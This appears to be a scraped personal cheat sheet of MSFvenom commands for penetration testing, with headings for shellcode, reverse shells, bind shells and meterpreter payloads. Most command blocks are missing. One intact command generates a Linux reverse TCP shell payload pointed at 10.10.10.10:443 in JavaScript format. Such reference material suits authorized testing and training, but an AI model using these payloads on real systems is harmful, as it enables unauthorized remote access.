MSFvenom Cheetsheet
My various MSFvenom commands to generate shellcode, reverse shells, and meterpreter payloads that I end up using over, and over, and over, and over...
Shellcode Generation
Generic Shellcode
Windows Reverse TCP Shell (Shellcode x86)
Only use this one if payload size is no problem and you can't determine the bad chars:
Windows Reverse TCP Shell Embedded in `plink.exe`
Bind Shell Shellcode
Reverse Shells
Oddball reverse shells that can trip you up. Those "Wait, I have done this before?" moments. Like when you see Tomcat running with default credentials or a ColdFusion Site (fuck me...)
JSP Reverse Shell
JavaScript Reverse Shells
If you are attacking a Windows host:
If you are attacking a Linux host: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 CMD=/bin/bash -f js_le -e generic/none
WAR (Java) Reverse Shell
Meterpreter Payloads
Don't just copy and paste - learn and understand the syntax. These will all be for x86 machines, so just swap it up to x64 to suite your needs.
Windows Meterpreter Payload
Windows Meterpreter Reverse HTTPS Payload (x86)
Linux Meterpreter Stager
Last updated